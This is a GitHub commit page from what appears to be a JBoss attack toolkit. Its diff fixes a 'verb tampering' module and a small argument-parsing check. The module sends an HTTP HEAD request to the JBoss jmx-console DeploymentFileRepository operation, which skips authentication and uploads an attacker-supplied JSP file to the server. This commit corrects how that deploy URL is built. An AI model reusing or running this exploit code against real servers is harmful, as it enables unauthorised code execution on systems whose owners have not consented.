Skip to content

Commit

Permalink
Few more Verb Tampering fixes
Browse files Browse the repository at this point in the history
* src/core/auxengine.py
  -- Sanity check
* src/platform/jboss/auxiliary/verb_tamper.py
  -- Modified debug message to be more...correct
  -- Fixed up the deploy URL; not sure how this got so messed up
  • Loading branch information
hatRiot committed Jan 25, 2015
1 parent cac3b14 commit d4fc21e
Show file tree
Hide file tree
Showing 2 changed files with 4 additions and 5 deletions.
2 changes: 1 addition & 1 deletion src/core/auxengine.py
Original file line number Diff line number Diff line change
Expand Up @@ -88,7 +88,7 @@ def build_platform_flags(platform, egroup):
if not 'flag' in dir(mod):
continue

if 'enable_args' in dir(mod):
if 'enable_args' in dir(mod) and mod.enable_args:
egroup.add_argument("--%s" % mod.flag, action='store', help=SUPPRESS)
else:
egroup.add_argument("--%s" % mod.flag, action='store_true', dest=mod.flag,
Expand Down
7 changes: 3 additions & 4 deletions src/platform/jboss/auxiliary/verb_tamper.py
Original file line number Diff line number Diff line change
Expand Up @@ -30,7 +30,7 @@ def run(self, fingerengine, fingerprint):
by submitting requests with different HTTP verbs, such as HEAD.
"""

utility.Msg("Checking %s for verb tampering" % fingerengine.options.ip,
utility.Msg("Deploying %s via verb tampering" % fingerengine.options.ip,
LOG.DEBUG)

url = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
Expand All @@ -43,9 +43,8 @@ def run(self, fingerengine, fingerprint):
war_name = parse_war_path(war_file)
tamper = "/jmx-console/HtmlAdaptor?action=invokeOp"\
"&name=jboss.admin:service=DeploymentFileRepository&methodIndex=5"\
"&arg0={0}&arg1={1}&arg2=.jsp&arg3={2}&arg4=True".format(
war_file.replace('.jsp', '.war'), war_name,
quote_plus(open(war_file).read()))
"&arg0={0}.war&arg1={0}&arg2=.jsp&arg3={1}&arg4=True".format(
war_name, quote_plus(open(war_file).read()))

response = utility.requests_head(url + tamper)
if response.status_code == 200:
Expand Down

0 comments on commit d4fc21e

Please sign in to comment.